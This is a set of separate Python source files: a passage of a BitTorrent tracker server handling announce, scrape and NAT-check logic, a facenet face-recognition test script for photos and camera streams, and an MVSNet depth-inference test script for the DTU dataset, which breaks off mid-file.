align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th></tr>\n') for name,hash in names: l = self.downloads[hash] n = self.completed.get(hash, 0) tn = tn + n c = self.seedcount[hash] tc = tc + c d = len(l) - c td = td + d if self.config['allowed_dir'] and self.show_names: if self.allowed.has_key(hash): nf = nf + 1 sz = self.allowed[hash]['length'] # size ts = ts + sz szt = sz * n # Transferred for this torrent tt = tt + szt if self.allow_get == 1: linkname = '<a href="/file?info_hash=' + quote(hash) + '">' + name + '</a>' else: linkname = name s.write('<tr><td><code>%s</code></td><td>%s</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i</td><td align="right">%s</td></tr>\n' \ % (b2a_hex(hash), linkname, size_format(sz), c, d, n, size_format(szt))) else: s.write('<tr><td><code>%s</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td></tr>\n' \ % (b2a_hex(hash), c, d, n)) if self.config['allowed_dir'] and self.show_names: s.write('<tr><td align="right" colspan="2">%i files</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i</td><td align="right">%s</td></tr>\n' % (nf, size_format(ts), tc, td, tn, size_format(tt))) else: s.write('<tr><td align="right">%i files</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i</td></tr>\n' % (nf, tc, td, tn)) s.write('</table>\n' \ '<ul>\n' \ '<li><em>info hash:</em> SHA1 hash of the "info" section of the metainfo (*.torrent)</li>\n' \ '<li><em>complete:</em> number of connected clients with the complete file</li>\n' \ '<li><em>downloading:</em> number of connected clients still downloading</li>\n' \ '<li><em>downloaded:</em> reported complete downloads</li>\n' \ '<li><em>transferred:</em> torrent size * total downloaded (does not include partial transfers)</li>\n' \ '</ul>\n') s.write('</body>\n' \ '</html>\n') return (200, 'OK', {'Content-Type': 'text/html; charset=iso-8859-1'}, s.getvalue()) except: print_exc() return (500, 'Internal Server Error', {'Content-Type': 'text/html; charset=iso-8859-1'}, 'Server Error') def scrapedata(self, hash, return_name = True): l = self.downloads[hash] n = self.completed.get(hash, 0) c = self.seedcount[hash] d = len(l) - c f = {'complete': c, 'incomplete': d, 'downloaded': n} if return_name and self.show_names and self.config['allowed_dir']: f['name'] = self.allowed[hash]['name'] return (f) def get_scrape(self, paramslist): fs = {} if paramslist.has_key('info_hash'): if self.config['scrape_allowed'] not in ['specific', 'full']: return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'specific scrape function is not available with this tracker.'})) for hash in paramslist['info_hash']: if self.allowed is not None: if self.allowed.has_key(hash): fs[hash] = self.scrapedata(hash) else: if self.downloads.has_key(hash): fs[hash] = self.scrapedata(hash) else: if self.config['scrape_allowed'] != 'full': return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'full scrape function is not available with this tracker.'})) if self.allowed is not None: keys = self.allowed.keys() else: keys = self.downloads.keys() for hash in keys: fs[hash] = self.scrapedata(hash) return (200, 'OK', {'Content-Type': 'text/plain'}, bencode({'files': fs})) def get_file(self, hash): if not self.allow_get: return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, 'get function is not available with this tracker.') if not self.allowed.has_key(hash): return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas) fname = self.allowed[hash]['file'] fpath = self.allowed[hash]['path'] return (200, 'OK', {'Content-Type': 'application/x-bittorrent', 'Content-Disposition': 'attachment; filename=' + fname}, open(fpath, 'rb').read()) def check_allowed(self, infohash, paramslist): if ( self.aggregator_key is not None and not ( paramslist.has_key('password') and paramslist['password'][0] == self.aggregator_key ) ): return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'Requested download is not authorized for use with this tracker.'})) if self.allowed is not None: if not self.allowed.has_key(infohash): return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'Requested download is not authorized for use with this tracker.'})) if self.config['allowed_controls']: if self.allowed[infohash].has_key('failure reason'): return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': self.allowed[infohash]['failure reason']})) if paramslist.has_key('tracker'): if ( self.config['multitracker_allowed'] == 'none' or # turned off paramslist['peer_id'][0] == self.trackerid ): # oops! contacted myself return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'disallowed'})) if ( self.config['multitracker_allowed'] == 'autodetect' and not self.allowed[infohash].has_key('announce-list') ): return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'Requested download is not authorized for multitracker use.'})) return None def cache_default(self): return [({},{}) for i in xrange(self.cache_default_len)] def add_data(self, infohash, event, ip, paramslist): peers = self.downloads.setdefault(infohash, {}) ts = self.times.setdefault(infohash, {}) self.completed.setdefault(infohash, 0) self.seedcount.setdefault(infohash, 0) def params(key, default = None, l = paramslist): if l.has_key(key): return l[key][0] return default myid = params('peer_id','') if len(myid) != 20: raise ValueError, 'id not of length 20' if event not in ['started', 'completed', 'stopped', 'snooped', None]: raise ValueError, 'invalid event' port = params('cryptoport') if port is None: port = params('port','') port = long(port) if port < 0 or port > 65535: raise ValueError, 'invalid port' left = long(params('left','')) if left < 0: raise ValueError, 'invalid amount left' uploaded = long(params('uploaded','')) downloaded = long(params('downloaded','')) if params('supportcrypto'): supportcrypto = 1 try: s = int(params['requirecrypto']) chr(s) except: s = 0 requirecrypto = s else: supportcrypto = 0 requirecrypto = 0 peer = peers.get(myid) islocal = local_IPs.includes(ip) mykey = params('key') if peer: auth = peer.get('key',-1) == mykey or peer.get('ip') == ip gip = params('ip') if is_valid_ip(gip) and (islocal or not self.only_local_override_ip): ip1 = gip else: ip1 = ip if params('numwant') is not None: rsize = min(int(params('numwant')),self.response_size) else: rsize = self.response_size if event == 'stopped': if peer: if auth: self.delete_peer(infohash,myid) elif not peer: ts[myid] = clock() peer = { 'ip': ip, 'port': port, 'left': left, 'supportcrypto': supportcrypto, 'requirecrypto': requirecrypto } if mykey: peer['key'] = mykey if gip: peer['given ip'] = gip if port: if not self.natcheck or islocal: peer['nat'] = 0 self.natcheckOK(infohash,myid,ip1,port,peer) else: NatCheck(self.connectback_result,infohash,myid,ip1,port, self.rawserver,encrypted=requirecrypto) else: peer['nat'] = 2**30 if event == 'completed': self.completed[infohash] += 1 if not left: self.seedcount[infohash] += 1 peers[myid] = peer else: if not auth: return rsize # return w/o changing stats ts[myid] = clock() if not left and peer['left']: self.completed[infohash] += 1 self.seedcount[infohash] += 1 if not peer.get('nat', -1): for bc in self.becache[infohash]: x = bc[0].get(myid) if x: bc[1][myid] = x del bc[0][myid] elif left and not peer['left']: self.completed[infohash] -= 1 self.seedcount[infohash] -= 1 if not peer.get('nat', -1): for bc in self.becache[infohash]: x = bc[1].get(myid) if x: bc[0][myid] = x del bc[1][myid] peer['left'] = left if port: recheck = False if ip != peer['ip']: peer['ip'] = ip recheck = True if gip != peer.get('given ip'): if gip: peer['given ip'] = gip elif peer.has_key('given ip'): del peer['given ip'] recheck = True natted = peer.get('nat', -1) if recheck: if natted == 0: l = self.becache[infohash] y = not peer['left'] for x in l: if x[y].has_key(myid): del x[y][myid] if natted >= 0: del peer['nat'] # restart NAT testing if natted and natted < self.natcheck: recheck = True if recheck: if not self.natcheck or islocal: peer['nat'] = 0 self.natcheckOK(infohash,myid,ip1,port,peer) else: NatCheck(self.connectback_result,infohash,myid,ip1,port, self.rawserver,encrypted=requirecrypto) return rsize def peerlist(self, infohash, stopped, tracker, is_seed, return_type, rsize, supportcrypto): data = {} # return data seeds = self.seedcount[infohash] data['complete'] = seeds data['incomplete'] = len(self.downloads[infohash]) - seeds if ( self.config['allowed_controls'] and self.allowed[infohash].has_key('warning message') ): data['warning message'] = self.allowed[infohash]['warning message'] if tracker: data['interval'] = self.config['multitracker_reannounce_interval'] if not rsize: return data cache = self.cached_t.setdefault(infohash, None) if ( not cache or len(cache[1]) < rsize or cache[0] + self.config['min_time_between_cache_refreshes'] < clock() ): bc = self.becache.setdefault(infohash,self.cache_default()) cache = [ clock(), bc[0][0].values() + bc[0][1].values() ] self.cached_t[infohash] = cache shuffle(cache[1]) cache = cache[1] data['peers'] = cache[-rsize:] del cache[-rsize:] return data data['interval'] = self.reannounce_interval if stopped or not rsize: # save some bandwidth data['peers'] = [] return data bc = self.becache.setdefault(infohash,self.cache_default()) len_l = len(bc[2][0]) len_s = len(bc[2][1]) if not (len_l+len_s): # caches are empty! data['peers'] = [] return data l_get_size = int(float(rsize)*(len_l)/(len_l+len_s)) if self.config['compact_reqd']: cache = self.cached.setdefault(infohash,[None,None,None])[return_type] else: cache = self.cached.setdefault(infohash,[None,None,None,None,None])[return_type] if cache and ( not cache[1] or (is_seed and len(cache[1]) < rsize) or len(cache[1]) < l_get_size or cache[0]+self.config['min_time_between_cache_refreshes'] < self.cachetime ): cache = None if not cache: peers = self.downloads[infohash] if self.config['compact_reqd']: vv = ([],[],[]) else: vv = ([],[],[],[],[]) for key, ip, port in self.t2tlist.harvest(infohash): # empty if disabled if not peers.has_key(key): cp = compact_peer_info(ip, port) vv[0].append(cp) vv[2].append((cp,'\x00')) if not self.config['compact_reqd']: vv[3].append({'ip': ip, 'port': port, 'peer id': key}) vv[4].append({'ip': ip, 'port': port}) cache = [ self.cachetime, bc[return_type][0].values()+vv[return_type], bc[return_type][1].values() ] shuffle(cache[1]) shuffle(cache[2]) self.cached[infohash][return_type] = cache for rr in xrange(len(self.cached[infohash])): if rr != return_type: try: self.cached[infohash][rr][1].extend(vv[rr]) except: pass if len(cache[1]) < l_get_size: peerdata = cache[1] if not is_seed: peerdata.extend(cache[2]) cache[1] = [] cache[2] = [] else: if not is_seed: peerdata = cache[2][l_get_size-rsize:] del cache[2][l_get_size-rsize:] rsize -= len(peerdata) else: peerdata = [] if rsize: peerdata.extend(cache[1][-rsize:]) del cache[1][-rsize:] if return_type == 0: data['peers'] = ''.join(peerdata) elif return_type == 1: data['crypto_flags'] = "0x01"*len(peerdata) data['peers'] = ''.join(peerdata) elif return_type == 2: data['crypto_flags'] = ''.join([p[1] for p in peerdata]) data['peers'] = ''.join([p[0] for p in peerdata]) else: data['peers'] = peerdata return data def get(self, connection, path, headers): real_ip = connection.get_ip() ip = real_ip if is_ipv4(ip): ipv4 = True else: try: ip = ipv6_to_ipv4(ip) ipv4 = True except ValueError: ipv4 = False if ( (self.allowed_IPs and not self.allowed_IPs.includes(ip)) or (self.banned_IPs and self.banned_IPs.includes(ip)) ): return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'your IP is not allowed on this tracker'})) nip = get_forwarded_ip(headers) if nip and not self.only_local_override_ip: ip = nip try: ip = to_ipv4(ip) ipv4 = True except ValueError: ipv4 = False paramslist = {} def params(key, default = None, l = paramslist): if l.has_key(key): return l[key][0] return default try: (scheme, netloc, path, pars, query, fragment) = urlparse(path) if self.uq_broken == 1: path = path.replace('+',' ') query = query.replace('+',' ') path = unquote(path)[1:] for s in query.split('&'): if s: i = s.index('=') kw = unquote(s[:i]) paramslist.setdefault(kw, []) paramslist[kw] += [unquote(s[i+1:])] if path == '' or path == 'index.html': return self.get_infopage() if (path == 'file'): return self.get_file(params('info_hash')) if path == 'favicon.ico' and self.favicon is not None: return (200, 'OK', {'Content-Type' : 'image/x-icon'}, self.favicon) # automated access from here on if path in ('scrape', 'scrape.php', 'tracker.php/scrape'): return self.get_scrape(paramslist) if not path in ('announce', 'announce.php', 'tracker.php/announce'): return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas) # main tracker function filtered = self.Filter.check(real_ip, paramslist, headers) if filtered: return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': filtered})) infohash = params('info_hash') if not infohash: raise ValueError, 'no info hash' notallowed = self.check_allowed(infohash, paramslist) if notallowed: return notallowed event = params('event') rsize = self.add_data(infohash, event, ip, paramslist) if event == 'completed': self.completedno=self.completedno+1 print "complete : %s" % self.completedno except ValueError, e: return (400, 'Bad Request', {'Content-Type': 'text/plain'}, 'you sent me garbage - ' + str(e)) if self.aggregate_forward and not paramslist.has_key('tracker'): self.aggregate_senddata(query) if self.is_aggregator: # don't return peer data here return (200, 'OK', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'response': 'OK'})) if params('compact') and ipv4: if params('requirecrypto'): return_type = 1 elif params('supportcrypto'): return_type = 2 else: return_type = 0 elif self.config['compact_reqd'] and ipv4: return (400, 'Bad Request', {'Content-Type': 'text/plain'}, 'your client is outdated, please upgrade') elif params('no_peer_id'): return_type = 4 else: return_type = 3 data = self.peerlist(infohash, event=='stopped', params('tracker'), not params('left'), return_type, rsize, params('supportcrypto')) if paramslist.has_key('scrape'): # deprecated data['scrape'] = self.scrapedata(infohash, False) if self.dedicated_seed_id: if params('seed_id') == self.dedicated_seed_id and params('left') == 0: self.is_seeded[infohash] = True if params('check_seeded') and self.is_seeded.get(infohash): data['seeded'] = 1 return (200, 'OK', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode(data)) def natcheckOK(self, infohash, peerid, ip, port, peer): seed = not peer['left'] bc = self.becache.setdefault(infohash,self.cache_default()) cp = compact_peer_info(ip, port) reqc = peer['requirecrypto'] bc[2][seed][peerid] = (cp,chr(reqc)) if peer['supportcrypto']: bc[1][seed][peerid] = cp if not reqc: bc[0][seed][peerid] = cp if not self.config['compact_reqd']: bc[3][seed][peerid] = Bencached(bencode({'ip': ip, 'port': port, 'peer id': peerid})) bc[4][seed][peerid] = Bencached(bencode({'ip': ip, 'port': port})) def natchecklog(self, peerid, ip, port, result): year, month, day, hour, minute, second, a, b, c = localtime(time()) print '%s - %s [%02d/%3s/%04d:%02d:%02d:%02d] "!natcheck-%s:%i" %i 0 - -' % ( ip, quote(peerid), day, months[month], year, hour, minute, second, ip, port, result) def connectback_result(self, result, downloadid, peerid, ip, port): record = self.downloads.get(downloadid,{}).get(peerid) if ( record is None or (record['ip'] != ip and record.get('given ip') != ip) or record['port'] != port ): if self.config['log_nat_checks']: self.natchecklog(peerid, ip, port, 404) return if self.config['log_nat_checks']: if result: x = 200 else: x = 503 self.natchecklog(peerid, ip, port, x) if not record.has_key('nat'): record['nat'] = int(not result) if result: self.natcheckOK(downloadid,peerid,ip,port,record) elif result and record['nat']: record['nat'] = 0 self.natcheckOK(downloadid,peerid,ip,port,record) elif not result: record['nat'] += 1 def remove_from_state(self, *l): for s in l: try: del self.state[s] except: pass def save_state(self): print "save state" self.rawserver.add_task(self.save_state, self.save_dfile_interval) h = open(self.dfile, 'wb') h.write(bencode(self.state)) h.close() def test_state_and_finish(self): exit = 0 elapsed = time() - self.tracker_inittime #print "config %s %s" % (self.tracker_max_completed, self.tracker_timeout) #print "show state" #print self.state["completed"] for k,v in self.state["completed"].items(): #print "completed %s and elapsed %s " % (v, elapsed) # Somehow the non-present event also +1 for self.state["completed"].items(), hence here # we use self.completedno #if self.tracker_max_completed != 0 and v >= self.tracker_max_completed: if self.tracker_max_completed != 0 and self.completedno >= self.tracker_max_completed: exit = 1 if self.tracker_timeout != 0 and elapsed >= self.tracker_timeout: exit = 1 if exit == 1: self.rawserver.shutdown() self.rawserver.set_finish() self.rawserver.add_task(self.test_state_and_finish, 5) def parse_allowed(self): self.rawserver.add_task(self.parse_allowed, self.parse_dir_interval) if self.config['allowed_dir']: r = parsedir( self.config['allowed_dir'], self.allowed, self.allowed_dir_files, self.allowed_dir_blocked, [".torrent"] ) ( self.allowed, self.allowed_dir_files, self.allowed_dir_blocked, added, garbage2 ) = r self.state['allowed'] = self.allowed self.state['allowed_dir_files'] = self.allowed_dir_files self.t2tlist.parse(self.allowed) else: f = self.config['allowed_list'] if self.allowed_list_mtime == os.path.getmtime(f): return try: r = parsetorrentlist(f, self.allowed) (self.allowed, added, garbage2) = r self.state['allowed_list'] = self.allowed except (IOError, OSError): print '**warning** unable to read allowed torrent list' return self.allowed_list_mtime = os.path.getmtime(f) for infohash in added.keys(): self.downloads.setdefault(infohash, {}) self.completed.setdefault(infohash, 0) self.seedcount.setdefault(infohash, 0) def read_ip_lists(self): self.rawserver.add_task(self.read_ip_lists,self.parse_dir_interval) f = self.config['allowed_ips'] if f and self.allowed_ip_mtime != os.path.getmtime(f): self.allowed_IPs = IP_List() try: self.allowed_IPs.read_fieldlist(f) self.allowed_ip_mtime = os.path.getmtime(f) except (IOError, OSError): print '**warning** unable to read allowed_IP list' f = self.config['banned_ips'] if f and self.banned_ip_mtime != os.path.getmtime(f): self.banned_IPs = IP_Range_List() try: self.banned_IPs.read_rangelist(f) self.banned_ip_mtime = os.path.getmtime(f) except (IOError, OSError): print '**warning** unable to read banned_IP list' def delete_peer(self, infohash, peerid): dls = self.downloads[infohash] peer = dls[peerid] if not peer['left']: self.seedcount[infohash] -= 1 if not peer.get('nat',-1): l = self.becache[infohash] y = not peer['left'] for x in l: if x[y].has_key(peerid): del x[y][peerid] del self.times[infohash][peerid] del dls[peerid] def expire_downloaders(self): for x in self.times.keys(): for myid, t in self.times[x].items(): if t < self.prevtime: self.delete_peer(x,myid) self.prevtime = clock() if (self.keep_dead != 1): for key, value in self.downloads.items(): if len(value) == 0 and ( self.allowed is None or not self.allowed.has_key(key) ): del self.times[key] del self.downloads[key] del self.seedcount[key] self.rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval) def track(args): if len(args) == 0: print formatDefinitions(defaults, 80) return try: config, files = parseargs(args, defaults, 0, 0) except ValueError, e: print 'error: ' + str(e) print 'run with no arguments for parameter explanations' return r = RawServer(Event(), config['timeout_check_interval'], config['socket_timeout'], ipv6_enable = config['ipv6_enabled']) t = Tracker(config, r) r.bind(config['port'], config['bind'], reuse = True, ipv6_socket_style = config['ipv6_binds_v4']) r.listen_forever(HTTPHandler(t.get, config['min_time_between_log_flushes'])) t.save_state() t.test_state_and_finish() print '# Shutting down: ' + isotime() def size_format(s): if (s < 1024): r = str(s) + 'B' elif (s < 1048576): r = str(int(s/1024)) + 'KiB' elif (s < 1073741824L): r = str(int(s/1048576)) + 'MiB' elif (s < 1099511627776L): r = str(int((s/1073741824.0)*100.0)/100.0) + 'GiB' else: r = str(int((s/1099511627776.0)*100.0)/100.0) + 'TiB' return(r)
test_facenet_recognition.py
import cv2 from test_facenet_register import FaceRecognition from PIL import Image, ImageDraw import multiprocessing as mp import time face_recognition = FaceRecognition("config_facenet.yaml") def recognition_photo(): frame = Image.open('datasets/multiface.jpg') results = face_recognition.recognition(frame) print(results) frame_draw = frame.copy() draw = ImageDraw.Draw(frame_draw) for result in results: draw.rectangle(result["bbox"], outline=(255, 255, 255)) if len(result["userid"]) > 0: userid = result["userid"].split("_") userid.pop(len(userid) - 1) draw.text((int(result["bbox"][0]), int(result["bbox"][1])), str("_".join(userid)), fill=(255, 255, 255), font=face_recognition.font) if result.get("emotion") is not None and len(result["emotion"]) > 0: draw.text((int(result["bbox"][0]), int(result["bbox"][1] + 20)), str(result["emotion"]), fill=(255, 255, 255), font=face_recognition.font) frame_draw.save('output/multiface_facenet.jpg') def recognition_video(): camara = cv2.VideoCapture(0) camara.set(cv2.CAP_PROP_FRAME_WIDTH, 500) camara.set(cv2.CAP_PROP_FRAME_HEIGHT, 500) camara.set(cv2.CAP_PROP_FPS, 25) while True: # 读取帧摄像头 ret, frame = camara.read() if ret: frame = cv2.flip(frame, 1) results = face_recognition.recognition(Image.fromarray(frame)) print(results) if results is not None: for result in results: cv2.rectangle(frame, (int(result['bbox'][0]), int(result['bbox'][1])), (int(result['bbox'][2]), int(result['bbox'][3])), (255, 255, 255), 2) if len(result["userid"]) > 0: userid = result["userid"].split("_") userid.pop(len(userid) - 1) cv2.putText(frame, str("_".join(userid)), (int(result['bbox'][0]), int(result['bbox'][1])), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255)) if result.get("emotion") is not None and len(result["emotion"]) > 0: cv2.putText(frame, str(result["emotion"]), (int(result['bbox'][0]), int(result['bbox'][1] + 20)), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255)) cv2.imshow('recognition_face', frame) if (cv2.waitKey(1) & 0xFF) == ord('q'): break camara.release() cv2.destroyAllWindows() def camera_put(queue, url): cap = cv2.VideoCapture(url) cap.set(cv2.CAP_PROP_FRAME_WIDTH, 500) cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 500) cap.set(cv2.CAP_PROP_FPS, 25) if cap.isOpened(): print(f"视频地址:{url}") while True: ret, frame = cap.read() if ret: queue.put(frame) time.sleep(0.01) def camera_get(queue, winname): cv2.namedWindow(winname, flags=cv2.WINDOW_FREERATIO) while True: frame = queue.get() frame = cv2.flip(frame, 1) results = face_recognition.recognition(Image.fromarray(frame)) print(results) if results is not None: for result in results: cv2.rectangle(frame, (int(result['bbox'][0]), int(result['bbox'][1])), (int(result['bbox'][2]), int(result['bbox'][3])), (255, 255, 255), 2) if len(result["userid"]) > 0: userid = result["userid"].split("_") userid.pop(len(userid) - 1) cv2.putText(frame, str("_".join(userid)), (int(result['bbox'][0]), int(result['bbox'][1])), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255)) if result.get("emotion") is not None and len(result["emotion"]) > 0: cv2.putText(frame, str(result["emotion"]), (int(result['bbox'][0]), int(result['bbox'][1] + 20)), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255)) cv2.imshow(winname, frame) cv2.waitKey(1) def run_single_camera(): mp.set_start_method(method='spawn') # init queue = mp.Queue(maxsize=2) camera_url = 0 processes = [mp.Process(target=camera_put, args=(queue, camera_url)), mp.Process(target=camera_get, args=(queue, f"{camera_url}"))] [process.start() for process in processes] [process.join() for process in processes] def run_multi_camera(): camera_urls = [ "rtsp://username:password@192.168.1.100/h264/ch1/main/av_stream", "rtsp://username:password@192.168.1.101//Streaming/Channels/1", "rtsp://username:password@192.168.1.102/cam/realmonitor?channel=1&subtype=0" ] mp.set_start_method(method='spawn') # init queues = [mp.Queue(maxsize=4) for _ in camera_urls] processes = [] for queue, camera_url in zip(queues, camera_urls): processes.append(mp.Process(target=image_put, args=(queue, camera_url))) processes.append(mp.Process(target=image_get, args=(queue, camera_url))) for process in processes: process.daemon = True process.start() for process in processes: process.join() if __name__ == '__main__': # recognition_photo() # recognition_video() run_single_camera()
test_dtu.py
from __future__ import print_function import multiprocessing from model import * from preprocess import * from tools.common import Notify import tensorflow as tf import matplotlib.pyplot as plt import os import time import sys import math import argparse import numpy as np import cv2 import matplotlib matplotlib.use('Agg') sys.path.append("../") # dataset parameters tf.app.flags.DEFINE_string('dense_folder', '/home/tejas/unsup_mvs/data/mvs_testing/dtu', """Root path to dense folder.""") tf.app.flags.DEFINE_string('output_folder', '/home/tejas/unsup_mvs/outputs/', """Root path to output folder.""") tf.app.flags.DEFINE_string('model_dir', '/home/tejas/unsup_mvs/saved_models/lambda1_128_nc3', """Path to restore the model.""") tf.app.flags.DEFINE_integer('ckpt_step', 45000, """ckpt step.""") # input parameters tf.app.flags.DEFINE_integer('view_num', 5, """Number of images (1 ref image and view_num - 1 view images).""") tf.app.flags.DEFINE_integer('max_d', 256, """Maximum depth step when testing.""") tf.app.flags.DEFINE_integer('max_w', 640, """Maximum image width when testing.""") tf.app.flags.DEFINE_integer('max_h', 512, """Maximum image height when testing.""") tf.app.flags.DEFINE_float('sample_scale', 0.25, """Downsample scale for building cost volume (W and H).""") tf.app.flags.DEFINE_float('interval_scale', 0.8, """Downsample scale for building cost volume (D).""") tf.app.flags.DEFINE_float('base_image_size', 8, """Base image size""") tf.app.flags.DEFINE_integer('batch_size', 1, """Testing batch size.""") tf.app.flags.DEFINE_bool('adaptive_scaling', True, """Let image size to fit the network, including 'scaling', 'cropping'""") FLAGS = tf.app.flags.FLAGS class MVSGenerator: """ data generator class, tf only accept generator without param """ def __init__(self, sample_list, view_num, mode): self.sample_list = sample_list self.view_num = view_num self.mode = mode self.sample_num = len(sample_list) self.counter = 0 def __iter__(self): while True: for data in self.sample_list: # read input data images = [] cams = [] image_index = int(os.path.splitext(os.path.basename(data[1]))[0]) selected_view_num = int(len(data) // 2) if self.mode == 'bf': selected_view_num -= 1 view_comb = data[0] for view in range(min(self.view_num, selected_view_num)): image_file = file_io.FileIO(data[2 * view + 1], mode='r') image = scipy.misc.imread(image_file, mode='RGB') image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) cam_file = file_io.FileIO(data[2 * view + 2], mode='r') cam = load_cam(cam_file, FLAGS.interval_scale) if cam[1][3][2] == 0: cam[1][3][2] = FLAGS.max_d images.append(image) cams.append(cam) if self.mode == 'bf': gt_depth = load_pfm(open(data[2 * selected_view_num + 1])) if selected_view_num < self.view_num: for view in range(selected_view_num, self.view_num): image_file = file_io.FileIO(data[1], mode='r') image = scipy.misc.imread(image_file, mode='RGB') image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) cam_file = file_io.FileIO(data[2], mode='r') cam = load_cam(cam_file, FLAGS.interval_scale) images.append(image) cams.append(cam) # print ('range: ', cams[0][1, 3, 0], cams[0][1, 3, 1], cams[0][1, 3, 2], cams[0][1, 3, 3]) # determine a proper scale to resize input resize_scale = 1 if FLAGS.adaptive_scaling: h_scale = 0 w_scale = 0 for view in range(self.view_num): height_scale = float(FLAGS.max_h) / images[view].shape[0] width_scale = float(FLAGS.max_w) / images[view].shape[1] if height_scale > h_scale: h_scale = height_scale if width_scale > w_scale: w_scale = width_scale if h_scale > 1 or w_scale > 1: print("max_h, max_w should < W and H!") exit(-1) resize_scale = h_scale if w_scale > h_scale: resize_scale = w_scale scaled_input_images, scaled_input_cams = scale_mvs_input(images, cams, scale=resize_scale) # crop to fit network croped_images, croped_cams = crop_mvs_input(scaled_input_images, scaled_input_cams) # center images centered_images = [] for view in range(self.view_num): centered_images.append(center_image(croped_images[view])) # sample cameras for building cost volume real_cams = np.copy(croped_cams) scaled_cams = scale_mvs_camera(croped_cams, scale=FLAGS.sample_scale) # return mvs input scaled_images = [] for view in range(self.view_num): scaled_images.append(scale_image(croped_images[view], scale=FLAGS.sample_scale)) scaled_images = np.stack(scaled_images, axis=0) croped_images = np.stack(croped_images, axis=0) scaled_cams = np.stack(scaled_cams, axis=0) self.counter += 1 retval = (scaled_images, centered_images, scaled_cams, image_index, view_comb) if self.mode == 'bf': retval += (gt_depth,) yield retval def mvsnet_pipeline(mvs_list, mode): print('sample number: ', len(mvs_list)) # create output folder output_folder = os.path.join(FLAGS.output_folder, 'depths_mvsnet') if not os.path.isdir(output_folder): os.makedirs(output_folder) # testing set mvs_generator = iter(MVSGenerator(mvs_list, FLAGS.view_num, mode)) generator_data_type = (tf.float32, tf.float32, tf.float32, tf.int32, tf.int32) if mode == 'bf': generator_data_type += (tf.float32,) mvs_set = tf.data.Dataset.from_generator(lambda: mvs_generator, generator_data_type) mvs_set = mvs_set.batch(FLAGS.batch_size) mvs_set = mvs_set.prefetch(buffer_size=1) # data from dataset via iterator mvs_iterator = mvs_set.make_initializable_iterator() if mode == 'bf': scaled_images, centered_images, scaled_cams, image_index, view_comb, gt_depth = mvs_iterator.get_next() else: scaled_images, centered_images, scaled_cams, image_index, view_comb = mvs_iterator.get_next() # set shapes scaled_images.set_shape(tf.TensorShape([None, FLAGS.view_num, None, None, 3])) centered_images.set_shape(tf.TensorShape([None, FLAGS.view_num, None, None, 3])) scaled_cams.set_shape(tf.TensorShape([None, FLAGS.view_num, 2, 4, 4])) depth_start = tf.reshape( tf.slice(scaled_cams, [0, 0, 1, 3, 0], [FLAGS.batch_size, 1, 1, 1, 1]), [FLAGS.batch_size]) depth_interval = tf.reshape( tf.slice(scaled_cams, [0, 0, 1, 3, 1], [FLAGS.batch_size, 1, 1, 1, 1]), [FLAGS.batch_size]) depth_num = tf.cast( tf.reshape(tf.slice(scaled_cams, [0, 0, 1, 3, 2], [1, 1, 1, 1, 1]), []), 'int32') # deal with inverse depth depth_end = tf.reshape( tf.slice(scaled_cams, [0, 0, 1, 3, 3], [FLAGS.batch_size, 1, 1, 1, 1]), [FLAGS.batch_size]) # depth map inference using 3DCNNs init_depth_map, prob_map = inference_mem( centered_images, scaled_cams, FLAGS.max_d, depth_start, depth_interval) # init option init_op = tf.global_variables_initializer() var_init_op = tf.local_variables_initializer() # GPU grows incrementally config = tf.ConfigProto() config.gpu_options.allow_growth = True with tf.Session(config=config) as sess: # initialization sess.run(var_init_op) sess.run(init_op) # load model if FLAGS.model_dir is not None: pretrained_model_ckpt_path = os.path.join(FLAGS.model_dir, 'model.ckpt') restorer = tf.train.Saver(tf.global_variables()) restorer.restore(sess, '-'.join([pretrained_model_ckpt_path, str(FLAGS.ckpt_step)])) print(Notify.INFO, 'Pre-trained model restored from %s' % ('-'.join([pretrained_model_ckpt_path, str(FLAGS.ckpt_step)])), Notify.ENDC) # run inference for each reference view sess.run(mvs_iterator.initializer) if mode == 'bf': last_img_id = None for step in range(len(mvs_list)): start_time = time.time() try: if mode == 'bf': out_init_depth_map, out_prob_map, out_images, out_cams, out_index, out_view_comb, out_gt_depth = sess.run([init_depth_map, prob_map, scaled_images, scaled_cams, image_index, view_comb, gt_depth]) else: out_init_depth_map, out_prob_map, out_images, out_cams, out_index, out_view_comb = sess.run([init_depth_map, prob_map, scaled_images, scaled_cams, image_index, view_comb]) except tf.errors.OutOfRangeError: print("all dense finished") # ==> "End of dataset" break duration = time.time() - start_time print(Notify.INFO, 'depth inference %d finished. (%.3f sec/step)' % (step, duration), Notify.ENDC) # 